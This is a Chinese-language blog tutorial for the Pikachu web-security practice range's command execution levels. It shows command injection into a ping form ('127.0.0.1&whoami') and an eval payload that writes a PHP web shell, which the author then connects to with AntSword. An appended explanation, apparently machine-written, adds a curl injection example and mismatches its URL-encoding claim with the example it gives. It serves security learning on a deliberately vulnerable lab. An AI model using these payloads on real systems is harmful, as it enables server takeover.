pikachu靶场(命令执行(RCE)通关教程)

第1关 exec "ping"

1.打开网站

看到一个ping的字样,想到这里应该是要写一个IP地址,这里用本地回环地址 

可以看到返回了,根据返回的TTL值,猜想到这里应该是Windows

使用命令可以观看之前写的博客

所以直接写入127.0.0.1&ipconfig,直接出现IP地址

写入 127.0.0.1&whoami

当然,这里还可以执行其他Windows命令,这里就不再演示 

 第2关 exec "eval"

首先来搜索下这个函数

可以看到这个函数会把函数里的字符串作为函数执行

所以在输入框中输入phpinfo();

这里也可以写一个木马

输入payload:fwrite(fopen('shell.php','w'),'<?php eval($_POST[attack]);?>');

虽然返回的是这样

 

但是当我们打开phpstudy的目录

打开蚁剑,连接木马 

连接成功,添加数据

上传成功。 

### 构建命令执行环境 为了在Pikachu Web安全测试平台上实现命令执行,需先确保已按照说明搭建好完整的实验环境[^1]。这包括安装并配置Burp Suite、PhpStudy以及Pikachu平台本身。 ### 利用远程命令执行漏洞 当存在远程命令执行RCE)漏洞时,通常是因为开发者未能充分验证或过滤用户输入的数据便将其用于构建操作系统指令字符串[^3]。具体到Pikachu靶场中的`clientcheck.php`文件,由于缺乏必要的输入校验机制,使得攻击者能够利用此脚本执行任意系统级命令[^4]。 假设目标URL为 `http://example.com/pikachu/vul/rce/cmd.php?ip=`, 可以尝试向其发送如下请求来触发命令注入: ```bash curl "http://example.com/pikachu/vul/rce/cmd.php?ip=8.8.8.8%20|%20whoami" ``` 上述命令会试图让服务器解析成两个独立的操作:首先是正常的ping查询(`8.8.8.8`);其次是追加了一个管道符(|),它允许后续紧跟另一个完全不同的Linux shell内置命令(`whoami`)被执行。注意这里使用了URL编码(%20代表空格,%7C代表|)以确保特殊字符能被正确传递给PHP脚本处理。 成功后应该可以在响应数据里看到当前运行进程的身份信息,证明已经实现了基本的命令注入行为。 重要提示:以上内容仅限于合法授权下的学习研究用途,在未经授权的情况下对他人计算机信息系统实施此类操作可能违反法律法规,请务必谨慎行事!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值